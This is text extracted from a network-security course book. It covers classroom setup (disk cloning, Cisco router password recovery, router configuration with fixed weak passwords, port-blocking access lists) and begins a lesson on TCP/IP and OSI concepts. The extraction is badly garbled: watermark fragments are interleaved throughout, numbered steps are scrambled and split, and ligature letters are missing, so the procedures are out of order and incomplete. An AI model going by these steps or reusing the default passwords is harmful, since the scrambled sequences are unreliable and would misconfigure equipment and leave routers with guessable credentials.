Every computer with the cloned hard drive must be manually recongured. You will have to keep track of variables such as computer names, host names, and TCP/IP conguration parameters. Cloning and conguration takes approximately 30 minutes per computer.
xxxviii
DO
ru ct
Cloning the Hard Drives
56. Shut down the system.
Nortons Ghost is a good product for cloning. If you opt not to use Sysprep, you will also need to use a SID-changer to change the SIDs for the Windows 2000 Server install. Nortons Ghostwalk is a good product for changing SIDs. You can also download a free SID changer from www.sysinternals.com/ntw2k/source/ newsid.shtml. As for Linuxsometimes Linux will not boot off a cloned hard drive. If you come across such problems, perform an install and choose the upgrade option. This takes about 10 minutes (as opposed to a 45-minute full install).
NO
Now that the installation of the operating systems is completed on one computer, the hard drive is ready to be cloned for use with all of the student computers, as well as the instructor computer. Please look after this disk well (well refer to it as the source hard drive), as it will serve you for many class preparations. The only thing to watch out for, if you have used evaluation versions, is the 120-day time limit on the Windows 2000 operating system.
PL
55. If you are not supplying the Linux tools on a CD-ROM or shared folder, copy the Linux tools to the hard drive.
IC
54. Log in as root again to test the GUI login.
or
AT
53. If additional software options are presented, ignore them. Click Forward twice.
iti
48. After you have veried the Linux installation, change the default login type to be GUI. To do this, you will need to edit the le /etc/inittab to change the line id:3:initdefault: to read id:5:initdefault:, and reboot the computer.
on
46. At the login prompt, enter the username root and password qwerty to verify that you can log in.
1. 2. 3. 4. 5.
Insert the master (source) hard drive into the Primary Master removable bay in your cloning machine. Insert the blank (destination) hard drive into the Secondary Master removable bay in your cloning machine. Boot using a bootable oppy disk, and run the cloning program. We recommend Nortons Ghost utility. Specify the source and destination drives. IMPORTANT: Do not accept the partition sizes on the destination driveyou must match the source drives partition sizes; that is, 2600 MB Primary, 100 MB (Linux /boot logical drive), 256 MB (Linux Swap logical drive), and 5+ GB (Linux / logical drive).
Estimated minimum time for cloning: 10 minutes per hard drive. If you can image the source hard drive to a le server and multicast this image over the network to all the student machines, estimated minimum time: 5 minutes per hard drive.
6.
When done selecting, click Continue and wait for the cloning process to complete.
After Cloning the Hard Drives

Perform the following steps for each cloned hard drive. 1. 2.
Insert the cloned hard drive into one of the student machines or the instructor machine.
Ed
T DU PL IC
a.
When you are prompted for a new computer name, enter a name as described in Figure 0-2. This will also create a new SID for each machine.
b. c.
Open the Network And Dial-up Connections Control Panel, rightclick Local Area Connection 1, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly. In the Network And Dial-up Connections Control Panel, right-click Local Area Connection 2, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly.
st
3.
Boot to Linux. Change the host name and IP addresses as described in Figure 0-2.
In
a.
If the machine hangs on GRUB, insert the Linux boot CD-ROM, reboot the machine, and upgrade your install. This should take only a few minutes. If you need to change the monitor resolution in Linux, run the X congurator. You can access Xconf by running setup from a terminal.
b.
DO
NO
d.
ru ct
Change the IP addresses and default gateway as described in Figure 0-2.
or
AT
Boot to Windows 2000 Server. Because you ran the Sysprep utility before cloning the hard drive, it should now run a short setup routine.
iti
on
Estimated minimum time for manual reconguration of cloned hard drives: 10 minutes per workstation, but if you can work in parallel (such as downloading the OS images over a network), you should be able to set up 12 computers with the appropriate conguration in under 4 hours.
About This Course
xxxix
4.
Estimated minimum time for router setup: 1 hour.
Shut down the computer.
Configuring Cisco Routers

Three Cisco routers are used in the class. The 2501 series is preferred, with a minimum IOS version of 12.2 (with IPSec/SSH support). The decision whether to allow or not allow the classroom machines to use the Internet is up to the Internet access policies of your location. You can congure NAT on the Instructor Machine to allow the class members to use the Internet. The default route conguration provided here assumes that you will have the Instructor Machine perform NAT. Alternatively, the CENTER router, the Instructor Machine and another device with NAT capabilities can all be connected to a hub. Whichever method you choose, just enter the appropriate conguration statement on the CENTER router. The following shows an overview of the conguration requirements of each router. They are to run IP with access lists congured and RIP as the routing protocol. Conguration beyond what is shown here is not required. Students will be asked to connect to the routers, so it is advised that the CENTER router the instructor uses have a different and more complex Enable Password. Students should be allowed to Telnet to all three routers. The LEFT router is for one half of the class to connect through. It should have the following conguration: Hostname and Routername: LEFT Access List Conguration:
Ed
T DU
or
DO NO
Access-list 123 deny tcp any any eq 25 Access-list 123 permit ip any any INT S0: ip access-group 123 in
st
In
xl
ru ct

Hostname and Routername: CENTER Access List Conguration:
Access-list 155 deny tcp any any eq 20 Access-list 155 deny tcp any any eq 21 Access-list 155 permit ip any any INT S0: ip access-group 155 in INT S1: ip access-group 155 in
The RIGHT router is for the other half of the class to connect through. It should have the following conguration: Hostname and Routername: RIGHT Access List Conguration: Access-list 145 deny tcp any any eq 25 Access-list 145 permit ip any any INT S1: ip access-group 145 in
PL
The CENTER router is for the Instructor to connect to the class. It should have the following conguration:
IC
AT
iti
on
The detailed conguration procedures are listed here in three main categories: Physical conguration Router setup Access list conguration
The LEFT router is to be connected to the CENTER router via a Cisco serial cable. The RIGHT router is also to be connected to the CENTER router via a Cisco serial cable. All Ethernet connections are to be made through standard 10/100 BaseT cables.
1. 2.
Study the class setup diagram provided in Figure 0-1.
or
DO NO
3. 4.
Before You Start the Router Setup
All routers should be cleared of any congs before setting up the class. If you have a congured router but you dont know the password, perform the following steps: 1. 2. 3. 4. 5. 6. Console into the router.
Enter the sh ver command, and record the conguration register setting (usually 0x2102). Power down the router, and then power it back up.
In
After the amount of main memory is displayed, press the Break key (or Ctrl+Break). You should see the > prompt with no router name. Enter o/r 0x42 to boot from ash or o/r 0x41 to boot from ROM. Typically, you would boot from ash if it were intact. Enter i to force the router to reboot and ignore its saved cong.
About This Course xli
st
DU
Connect the Ethernet interfaces on the LEFT and RIGHT routers to their respective hubs serving their side of the classroom.
ru ct
PL
Connect the Ethernet interface on the CENTER router to the instructor machine via a crossover Ethernet cable.
IC
Physically connect the three routers to each other, using serial crossover cables, so that the router designated as CENTER controls the clock rate. To do this, connect the DCE end of the serial cable to the serial interfaces on the CENTER router and the DTE ends to the LEFT and RIGHTs appropriate serial interfaces.
Ed
AT
iti
on
Physical Router Configuration
7. 8.
Answer no to all setup questions. When the Router> prompt is displayed, enter enable to switch to enable mode. The Router# prompt should now be displayed. Once you are in enable mode, you can view and change the password, and you can erase the cong.
10. To change the password, from the Router# prompt: a. b. c. d. Enter cong mem to copy NVRAM to mem. Enter wr term.
e. f.
Press Ctrl+Z to exit cong mode. The Router# prompt is now displayed. Enter write mem to commit the changes to mem. You should now be able to console in and congure the router.
Ed
T DU
If an enable secret password is set, enter enable secret newpassword, or if there is no enable secret password, enter enable password newpassword, where newpassword is the new password you want to use.
11. To erase the cong, from the Router# prompt:
b. c. d. e. f.
st
1.
In
Boot up the router and console into it. You should be prompted to enter the initial conguration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.) When you are prompted: a. To enter the initial conguration dialog, enter y. To enter basic management setup, enter n. As to whether you want to see the current interface summary, press Enter.
2.
b. c.
xlii
DO
ru ct
Enter reload. g.
Press Ctrl+Z to exit cong mode. The Router# prompt is now displayed.
When you are prompted to save the modied system conguration, enter y.
Setup for CENTER Router
The CENTER router is used by the instructor to connect to the rest of the class. To set up the CENTER router:
NO
When you are prompted to proceed with the reload, enter y.
PL
Enter cong-register 0x2102 or whatever the conguration register setting was when you began.
IC
Enter cong term to enter cong mode. The Router(cong)# prompt is now displayed.
or
a.
Enter write erase.
AT
iti
Enter cong term to enter cong mode. The Router(cong)# prompt is now displayed.
on
9.
To view the password, enter show cong at the Router# prompt.
d. e. f. g. h. i. j. k. l. n. o. p. q. r. s. t. u. v. w. x. y. z.
To enter the host name for [Router], enter CENTER. To enter the enable secret password, enter instructor. To enter the enable password, enter cisco1. To enter the virtual terminal password, enter 2501. To congure LAT, enter n. To congure bridging, press Enter to accept the default of No. To congure AppleTalk, press Enter to accept the default of No. To congure DECnet, press Enter to accept the default of No. To congure IGRP routing, enter n. To congure RIP routing, enter y. To congure CLNS, press Enter to accept the default of No. To congure IPX, press Enter to accept the default of No. To congure Vines, press Enter to accept the default of No. To congure XNS, press Enter to accept the default of No. If you are prompted to congure BRI, select switch type 0. To congure SNMP network management, enter n.
To congure Apollo, press Enter to accept the default of No.
Ed
T DU PL IC
To congure IP on this interface, press Enter to accept the default of Yes. For the IP address for this interface, enter 172.17.0.1. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0. To congure the Serial0 interface, press Enter to accept the default of Yes.
aa. To congure IP on this interface, press Enter to accept the default of Yes.
ac. For the IP address for this interface, enter 192.168.20.2.
st
ae. To congure the Serial1 interface, press Enter to accept the default of Yes.
In
af. To congure IP on this interface, press Enter to accept the default of Yes.
ag. To congure IP unnumbered on this interface, press Enter to accept the default of No. ah. For the IP address for this interface, enter 192.168.10.2. ai. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.
DO
ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.
NO
ab. To congure IP unnumbered on this interface, press Enter to accept the default of No.
ru ct
or
AT
About This Course xliii
To congure the Ethernet0 interface, press Enter to accept the default of Yes.
iti
m. To congure IP, press Enter to accept the default of Yes.
on
aj.
If you are prompted to congure any other serial interfaces, enter n until a conguration command script is generated, and you are prompted to make a selection regarding the next action.
al. 3. 4. 5. 6.
To press RETURN to get started, press Enter. The CENTER> prompt should now be displayed.
At the CENTER> prompt, enter en to activate enable mode.
At the CENTER# prompt, enter conf t to enter cong mode. The CENTER(cong)# prompt should now be displayed. At the CENTER(cong)# prompt: a. b. Enter no ip domain lookup.
Enter int s0 and the CENTER(cong-if)# prompt should now be displayed.
Ed
T DU
7.
At the CENTER(cong-if)# prompt: a. b. c. d. e. f. Enter no shut.
Enter ban 10000000. Enter int s1. Enter no shut.
st
9.
At the CENTER# prompt: Enter sh run and you should see a message indicating that the router is building the conguration. Enter copy ru st.
a. b.
In
10. When you are prompted for a destination lename, press Enter to accept the default of startup-cong. You should again see a message indicating that the router is building the conguration.
xliv
DO
ru ct
g. h. 8. a. b.
Enter clo ra 4000000. Enter ban 10000000.
Enter exit and the CENTER(cong)# prompt is now displayed.
At the CENTER(cong)# prompt:
Enter ip route 0.0.0.0 0.0.0.0 172.17.10.1. Enter exit and the CENTER# prompt is now displayed.
NO
PL
IC
Enter clo ra 4000000.
or
AT
iti
When you are prompted for the password, enter instructor. The CENTER# prompt should now be displayed.
on
ak. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the conguration. When the conguration build is complete, an OK message is displayed.
Setup for LEFT Router

The LEFT router is used by half of the students to connect to the rest of the class. To set up the LEFT router: 1. Boot up the router and console into it. You should be prompted to enter the initial conguration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.) When you are prompted: a. b. c. d. e. f. g. h. i. j. k. l. n. o. p. q. r. s. t. u. v. w. x. y. z. To enter the initial conguration dialog, enter y. To enter basic management setup, enter n. As to whether you want to see the current interface summary, press Enter. To enter the host name for [Router], enter LEFT. To enter the enable secret password, enter cisco. To enter the enable password, enter cisco1. To enter the virtual terminal password, enter 2501. To congure LAT, enter n.
2.
To congure SNMP network management, enter n.
To congure bridging, press Enter to accept the default of No. To congure DECnet, press Enter to accept the default of No.
Ed
T DU PL IC
To congure AppleTalk, press Enter to accept the default of No.
m. To congure IP, press Enter to accept the default of Yes. To congure IGRP routing, enter n. To congure RIP routing, enter y.
To congure IPX, press Enter to accept the default of No. To congure Vines, press Enter to accept the default of No. To congure XNS, press Enter to accept the default of No. If you are prompted to congure BRI, select switch type 0.
To congure Apollo, press Enter to accept the default of No.
st
For the IP address for this interface, enter 172.16.0.1. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.
In
To congure the Serial0 interface, press Enter to accept the default of Yes.
aa. To congure IP on this interface, press Enter to accept the default of Yes. ab. To congure IP unnumbered on this interface, press Enter to accept the default of No.
About This Course xlv
DO
To congure IP on this interface, press Enter to accept the default of Yes.
ru ct
To congure CLNS, press Enter to accept the default of No.
NO
or
AT
iti
on
ac. For the IP address for this interface, enter 192.168.10.1. ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0. ae. To congure the Serial1 interface, enter n. af. If you are prompted to congure any other serial interfaces, enter n until a conguration command script is generated, and you are prompted to make a selection regarding the next action. ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the conguration. When the conguration build is complete, an OK message is displayed. ah. To press RETURN to get started, press Enter. The LEFT> prompt should now be displayed. 3. 4. 5. 6. At the LEFT> prompt, enter en to activate enable mode.
When you are prompted for the password, enter cisco. The LEFT# prompt should now be displayed. At the LEFT# prompt, enter conf t to enter cong mode. The LEFT(cong)# prompt should now be displayed.
b. 7.
Enter int s0 and the LEFT(cong-if)# prompt should now be displayed.
or
DO NO
At the LEFT(cong-if)# prompt: a. b. c. Enter no shut.
ru ct
8. a. b. 9.
Enter ban 10000000.
At the LEFT(cong)# prompt:
Enter exit and the LEFT# prompt is now displayed.
At the LEFT# prompt: a.
st
Enter sh run and you should see a message indicating that the router is building the conguration. Enter copy ru st.
b.
In
Setup for RIGHT Router

The RIGHT router is used by half of the students to connect to the rest of the class. To set up the RIGHT router:
xlvi
Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2.
DU
Enter exit and the LEFT(cong)# prompt is now displayed.
PL
IC
AT
a.
Enter no ip domain lookup.
At the LEFT(cong)# prompt:
Ed
iti
on
1.
Boot up the router and console into it. You should be prompted to enter the initial conguration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.) When you are prompted:
2.
b. c. d. e. f. g. h. i. j. k. l. n. o. p. q. r. s. t. u. v. w. x. y. z.
To enter basic management setup, enter n. As to whether you want to see the current interface summary, press Enter. To enter the host name for [Router], enter RIGHT. To enter the enable secret password, enter cisco. To enter the enable password, enter cisco1. To enter the virtual terminal password, enter 2501. To congure SNMP network management, enter n. To congure LAT, enter n.
To congure bridging, press Enter to accept the default of No. To congure DECnet, press Enter to accept the default of No. To congure IGRP routing, enter n. To congure RIP routing, enter y.
To congure AppleTalk, press Enter to accept the default of No.
m. To congure IP, press Enter to accept the default of Yes.
Ed
T DU PL IC
To congure CLNS, press Enter to accept the default of No. To congure IPX, press Enter to accept the default of No. To congure Vines, press Enter to accept the default of No. To congure XNS, press Enter to accept the default of No. To congure Apollo, press Enter to accept the default of No. If you are prompted to congure BRI, select switch type 0.
For the IP address for this interface, enter 172.18.0.1.
st
To congure the Serial0 interface, enter n.
aa. To congure the Serial1 interface, press Enter to accept the default of Yes.
In
ab. To congure IP on this interface, press Enter to accept the default of Yes.
ac. To congure IP unnumbered on this interface, press Enter to accept the default of No. ad. For the IP address for this interface, enter 192.168.20.1. ae. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.
About This Course xlvii
DO
For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.
NO
To congure IP on this interface, press Enter to accept the default of Yes.
ru ct
or
AT
iti
on
a.
To enter the initial conguration dialog, enter y.
af. If you are prompted to congure any other serial interfaces, enter n until a conguration command script is generated, and you are prompted to make a selection regarding the next action. ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the conguration. When the conguration build is complete, an OK message is displayed. ah. To press RETURN to get started, press Enter. The RIGHT> prompt should now be displayed. 3. 4. 5. 6. At the RIGHT> prompt, enter en to activate enable mode.
At the RIGHT# prompt, enter conf t to enter cong mode. The RIGHT(cong)# prompt should now be displayed. At the RIGHT(cong)# prompt: a. b.
Enter no ip domain lookup.
Enter int s1 and the RIGHT(cong-if)# prompt should now be displayed.
Ed
T DU
7.
At the RIGHT(cong-if)# prompt: a. b. c. Enter no shut.
Enter exit and the RIGHT(cong)# prompt is now displayed.
st
In
Configuring the Access Lists

After the initial router setup and the basic conguration have been completed on all three routers, you need to enter the access lists for each of the routers. To do so: 1. To complete the LEFT Router Access Lists:
xlviii
DO
ru ct
a. b. 9. a. b.
8.
At the RIGHT(cong)# prompt:
Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2.
Enter exit and the RIGHT# prompt is now displayed.
At the RIGHT# prompt:
Enter copy ru st.
NO
Enter sh run and you should see a message indicating that the router is building the conguration.
PL
IC
Enter ban 10000000.
or
AT
iti
When you are prompted for the password, enter cisco. The RIGHT# prompt should now be displayed.
on
a. b. c. d. e. f. g. 2.
At the LEFT# prompt, enter conf t to switch to cong mode. The LEFT(cong)# prompt is now displayed. At the LEFT(cong)# prompt, enter access-list 123 deny tcp any any eq 25. At the LEFT(cong)# prompt, enter int S0 to congure the interface. The LEFT(cong-if)# prompt is now displayed. At the LEFT(cong-if)# prompt, enter ip access-group 123 in. At the LEFT(cong-if)# prompt, press Ctrl+Z to leave cong mode. The LEFT# prompt is now displayed. At the LEFT# prompt, enter copy ru st and save the conguration changes to startup-cong.
To complete the RIGHT Router Access Lists: a. b. c. d. e. f. g.
At the RIGHT# prompt, enter conf t to switch to cong mode. The RIGHT(cong)# prompt is now displayed.
At the RIGHT(cong)# prompt, enter access-list 145 deny tcp any any eq 25. At the RIGHT(cong)# prompt, enter access-list 145 permit ip any any.
Ed
T DU PL IC
At the RIGHT(cong-if)# prompt, enter ip access-group 145 in. At the RIGHT(cong-if)# prompt, press Ctrl+Z to leave cong mode. The RIGHT# prompt is now displayed.
3.
To complete the CENTER Router Access Lists: a. b. c. d. e. f.
At the CENTER# prompt, enter conf t to switch to cong mode. The CENTER(cong)# prompt is now displayed.
st
At the CENTER(cong)# prompt, enter access-list 155 deny tcp any any eq 21. At the CENTER(cong)# prompt, enter access-list 155 permit ip any any. At the CENTER(cong)# prompt, enter int S1 to congure the S1 interface. The CENTER(cong-if)# prompt is now displayed. At the CENTER(cong-if)# prompt, enter ip access-group 155 in. At the CENTER(cong-if)# prompt, enter int S0 to congure the S0 interface. At the CENTER(cong-if)# prompt, enter ip access-group 155 in. At the CENTER(cong-if)# prompt, press Ctrl+Z to leave cong mode. The CENTER# prompt is now displayed.
About This Course xlix
In
g. h. i.
DO
NO
At the CENTER(cong)# prompt, enter access-list 155 deny tcp any any eq 20.
ru ct
At the RIGHT# prompt, enter copy ru st and save the conguration changes to startup-cong.
or
AT
At the RIGHT(cong)# prompt, enter int S1 to congure the interface. The RIGHT(cong-if)# prompt is now displayed.
iti
on
At the LEFT(cong)# prompt, enter access-list 123 permit ip any any.
j. 4.
At the CENTER# prompt, enter copy ru st and save the conguration changes to startup-cong.
List of Additional Files
HOW TO USE THIS BOOK
You can use this book as a learning guide, a review tool, and a reference.
Ed
T DU
st
In
As a Reference
You can use the Concepts sections in this book as a rst source for denitions of terms, background information on given topics, and summaries of procedures.
DO
ru ct
As a Review Tool
We organized each lesson into explanatory topics and step-by-step activities. Topics provide the theory you need to master Hardening the Infrastructure, activities allow you to apply this theory to practical hands-on examples. Through the use of sample les, hands-on activities, illustrations that give you feedback at crucial steps, and supporting background information, this book provides you with the foundation and structure to learn about Hardening the Infrastructure quickly and easily.
Any method of instruction is only as effective as the time and effort you are willing to invest in it. For this reason, we encourage you to spend some time reviewing the books more challenging topics and activities.
NO
PL
Each lesson covers one broad topic or set of related topics. Lessons are arranged in order of increasing prociency with Hardening the Infrastructure; skills you acquire in one lesson are used and developed in subsequent lessons. For this reason, you should work through the lessons in sequence.
or
IC
AT
As a Learning Guide
iti
Printed with each lesson is a list of les students open to complete the tasks in that lesson. Many tasks also require additional les that students do not open, but are needed to support the le(s) students are working with. These supporting les are included with the student data les on the course CD-ROM or data disk. Do not delete these les.
on
Test the classroom setup, and troubleshoot as necessary. Once physical connectivity issues have been sorted out, you should be able to ping from one side of the classroom to the other. Specically, the instructor machine should be able to ping every student machine and vice versa. Student machines from the left side of the classroom should be able to ping student machines on the right side of the classroom and vice versa.
In ru ct
NO IC AT T DU PL E
st or Ed iti on
DO
About This Course
li
Ed or ru ct st
lii Hardening The Infrastructure (SCP)
In
DO
NO
DU
PL
IC
AT
iti
on
Advanced TCP/IP
Overview
There is one primary set of protocols that runs networks and the Internet today. In this lesson, you will work with those protocols: the Transmission Control Protocol (TCP) and the Internet Protocol (IP). In order to manage the security of a network, you must become familiar with the details of how TCP/IP functions, including core concepts, such as addressing and subnetting, and advanced concepts, such as session establishment and packet analysis.
LESSON
Objectives
1A Dene the core concepts of TCP/IP.
To better understand advanced TCP/IP concepts, you will:
Ed
T DU PL IC
1B
Analyze sessions of TCP.
1C
Analyze IP.
1D
Analyze ICMP.
st
1E
Analyze TCP.
1F
In
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the elds of TCP. Analyze UDP.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the elds of UDP.
DO
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the elds of ICMP.
NO
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the elds of IP.
ru ct
Given a Windows 2000 computer, you will examine control ags, sequence numbers, and acknowledgement numbers, and you will use Network Monitor to view and analyze all of the elds of the three-way handshake and session teardowns.
or
AT
Lesson 1: Advanced TCP/IP
Given a machine running TCP/IP, you will dene the core concepts of TCP/IP, including the layering models, RFCs, addressing and subnetting, VLSM and CIDR, and the TCP/IP suite.
E
1
iti
on
Data Files tftp.cap fragment.cap ping.txt ping.cap ftp.txt ftp.cap Lesson Time 6 hours
1G
Analyze fragmentation. Given a Windows 2000 computer, you will use Network Monitor to view and analyze network traffic fragmentation.
1H
Complete a full session analysis.
1I
Examine the concepts of Internet Protocol version 6.
In this topic, you will be introduced to the fundamental concepts surrounding Internet Protocol version 6, and its implementation in networking.
Ed or ru ct st
2 Hardening The Infrastructure (SCP)
In
DO
NO
DU
PL
IC
AT
iti
on
Given a Windows 2000 computer, you will use Network Monitor to view and analyze a complete FTP session, frame by frame.
Topic 1A
TCP/IP Concepts
The TCP/IP Model

In order for data to move from one host to another, it must be transmitted and received. There are several ways that this could happen, in theory.
The data le could be sent as a whole le, intact, from one host to another.
The data le could be split into many smaller pieces, all sent and received in a specic sequence.
or
DO NO
ru ct
Figure 1-1: A Web request moving along the TCP/IP Model. The four layers of the TCP/IP Model are: The Application Layer The Transport Layer The Internet Layer (also called the Network Layer)
DU T
PL
IC
AT
It is this last method that is actually used. For example, if a user is at a host and wants to view a Web page on a different host, the request and subsequent response will take many small steps to complete. In Figure 1-1, you can see the four layers of the TCP/IP Model, along with the Web browsers request for a Web page going to the Web server.
Ed
The data le could be split in half and sent, sending and receiving two equal sized pieces.
In
The Network Access Layer (also called the Link Layer)
st
iti
on
In order for two hosts to communicate, there must rst be an agreed-upon method of communication for both hosts to use. The protocol that the Internet was built on, and the protocol that all hosts on the Internet use is TCP/IP, or Transmission Control Protocol/Internet Protocol. Because the two hosts agree on the protocol they will use, we can go right into the details of the protocol itself.
Many of the Concepts in this topic were covered in the prerequisite courses, but are provided here for review.
host: A single computer or workstation; it can be connected to a network.
server: A system that provides network service such as disk storage and le transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
A Web Request Moving Along the TCP/IP Model
The TCP/IP Layers
network: Two or more machines interconnected for communications.
The Transport Layer is where the reliability of the communication is dealt with. There are two protocols that work at this layer, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). An immediate difference between the two is that TCP does provide for reliable delivery of data, whereas UDP provides no such guarantee.
As you saw in Figure 1-1, as the Web page request was initiated on the host, it moved down the layers, was transmitted across the network, and moved up the layers on the Web server. These are the layers on which all network communication using TCP/IP is based. There is a different set of layers, however, called the OSI Model.
Ed
T DU
The Network Access Layer (or Link Layer) is where the data communication interacts with the physical medium of the network. This is the layer that does the actual sending and receiving of the data.
st
OSI: (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.
In
DO
ru ct
The Session Layer The Transport Layer The Network Layer The Physical Layer
The Open Systems Interconnect (OSI) Model has seven layers, compared to the four layers of the TCP/IP Model. The seven layers of the OSI Model are: The Application Layer The Presentation Layer
The Data Link Layer
NO
PL
The TCP/IP Model works well for TCP/IP communications, but there are many protocols and methods of communication other than TCP/IP. A standard was needed to encompass all of the communication protocols. The standard developed by the International Organization for Standardization (ISO) is called the OSI Model.
or
IC
AT
The OSI Model
iti
The Internet Layer (or Network Layer) provides the mechanism required to address and move the data from one host to the other. The primary protocol you will examine at this layer is IP (Internet Protocol).
on
The reason that there are alternate names for these layers is that there has never been an agreed-upon standard for the names to which the industry agrees. Each of these layers are detailed as follows: The Application Layer is the highest layer in the model, and communicates with the software that requires the network. In our example, the software is the Web page request from a browser.
The names of these layers are xed, as this is an agreed upon standard. The details of each layer are as follows: The Application Layer is the highest layer of the OSI Model, and deals with interaction between the software and the network. The Presentation Layer is responsible for data services such as data compression and data encryption/decryption. The Session Layer is responsible for establishing, managing (such as packet size), and ending a session between two hosts. The Transport Layer is responsible for error control and data recovery between two hosts. Both TCP and UDP work at this layer. The Network Layer is responsible for logical addressing, routing, and forwarding of datagrams. IP works at this layer.
The OSI Layers
ru ct st
Figure 1-2: A comparison of the OSI and TCP/IP Models.
PL
The OSI Model and the TCP/IP Model do t together. In Figure 1-2, you can see that the two primary layers of concern in the TCP/IP Model (the Transport and Internet Layers), match directly with the Transport and Network Layers of the OSI Model, while the other two TCP/IP Model layers encompass two or more layers of the OSI Model.
or
DO NO
IC
A Comparison of the OSI and TCP/IP Models
In
DU
AT
E
5
The Physical Layer is responsible for the actual transmission and receipt of the data bit stream on the physical medium.
Ed
The Data Link Layer is responsible for packaging data frames for transmission on the physical medium. Error control is added at this layer, often in the form of a Cyclic Redundancy Check (CRC). This layer is subdivided into the LLC (Logical Link Control) and MAC (Media Access Control) sublayers. The MAC sublayer is associated with the physical address of the network device and the LLC sublayer makes the association between this physical address (such as the 48-bit MAC address if using Ethernet) and the logical address (such as the 32-bit IP address if using IP) at the Network Layer.
iti
on
packet: A block of data sent over the network transmitting the identities of the sending and receiving stations, errorcontrol information, and message.
As the data from one host ows down the layers of the model, each layer attaches a small piece of information relevant to that layer. This attachment is called the header. For example, the Network Layer header will identify the logical addresses (such as IP addresses) used for this transmission. This process of adding a header at each layer is called encapsulating. Figure 1-3 shows a visual representation of the header and the encapsulation process.
Headers and the Encapsulation Process
Figure 1-3: Headers and the encapsulation process as data moves down the stack. When the second host receives the data, and as the data moves up the layers, each header will let the host know how to handle this piece of data. After all the headers have been removed, the receiving host is left with the data as it was sent.
Ed
T DU
st
Key RFCs
The Transmission Control Protocol (TCP): RFC 793 The User Datagram Protocol (UDP): RFC 768
In
DO
ru ct
With all the standards dened in the previous section, you may be asking where to go to nd the standards. The answer is to the RFCs. A Request For Comments (RFC) is the industry location for standards relating to TCP/IP and the Internet. RFCs are freely available documents to read and study, and if you ever want to go directly to the source, be sure to use the RFC. Although you will nd RFCs listed all over the Internet, to view them all online go to: www.rfc-editor.org. This is the Web site with a searchable index of all RFCs. There are several RFCs you should be familiar with, and that you should know by name to look up. This way you will not have to search hundreds of responses to nd what you need. The RFCs you should know are: The Internet Protocol (IP): RFC 791 The Internet Control Messaging Protocol (ICMP): RFC 792
NO
PL
IC
RFCs
or
AT
iti
on
The Function of IP
The Internet Protocol (which works at the Network layer of both the OSI and the TCP/IP models), by denition, has a simple function. IP identies the current hostvia an addressand using addressing, moves a packet of information from one host to another. Each host on the network has a unique IP address, and each packet the host sends will contain its own IP address and the IP address to which the packet is destined.
The packets are then directed, or routed, across the network, using the destination address, until they reach their nal destination. The receiving host can read the IP address of the sender and send a response, if required. Although it sounds straightforward, and does work, there are drawbacks. For instance, when packets are sent from one host to another, they may be received out of order. IP has no mechanism for dealing with that problem. Also, packets can get lost or corrupted during transmission, again a problem IP does not manage. These problems are left to an upper protocol to manage. Often that protocol will be TCP, as you will see in the following topic.
Binary, Decimal, and Hexadecimal Conversions
Binary 10000010 is decimal 130 or 128+0+0+0+0+0+2+0 Binary 01011010 is decimal 90 or 0+64+0+16+8+0+2+0
st
The IP addresses that are either manually or dynamically assigned to a host are 32-bit elds, often shown as four decimal values for ease of reading. For example, a common address would be 192.168.10.1. Each number is an 8-bit binary value, or an octet. In this example, the rst octet is 192, the second 168, the third 10, and the fourth 1. Even though the fourth octet is given a decimal value of 1, it is still given an 8-bit value in IP addressing. Each bit of the 32-bit address must be represented, so the computer sees a decimal 1 in an IP address as 00000001. Keeping this in mind, the full decimal IP address of 192.168.10.1 is seen to the computer as binary IP address: 11000000.10101000.00001010.00000001 In tools that are designed to capture and analyze network traffic, the IP address is often represented in its hexadecimal (Hex) format. The ability to view and recognize addressing in Hex format is a useful skill to have when you are working with TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A01. Following is a quick summary on Hex conversions.
In
DO
NO
DU
Binary 10000000 is decimal 128 or 128+0+0+0+0+0+0+0
ru ct
PL
When the bits are presented as a byte, the value of each of the 8 locations is added to present you with the decimal equivalent. For example, if all 8 bits were 1s, such as 11111111, then the decimal value would be 255 or 128+64+32+16+8+4+2+1. Here are a few other quick binary to decimal conversions: Binary 11000000 is decimal 192 or 128+64+0+0+0+0+0+0
or
IC
AT
Even though you may be familiar with the concept of binary math, you may wish to review this section briey. In binary, each bit has the ability to be either a 1 or a 0. In computers, these bits are stored in groups of 8. Since each bit can be either a 1 or a 0, each location is designated a power of 2. A byte, therefore, has binary values from 20 through 27. In Figure 1-4, you can see the value of each of the 8 bits in a byte.
Ed
E
7
iti
on
To convert the decimal address 192.168.10.1 to hexadecimal, convert each of its octets, then combine the results, as follows: 1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal 12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 is equal to Hex C0.
3. 4. 5.
Decimal 10 is the same as Hex A. Decimal 1 is the same as Hex 1.
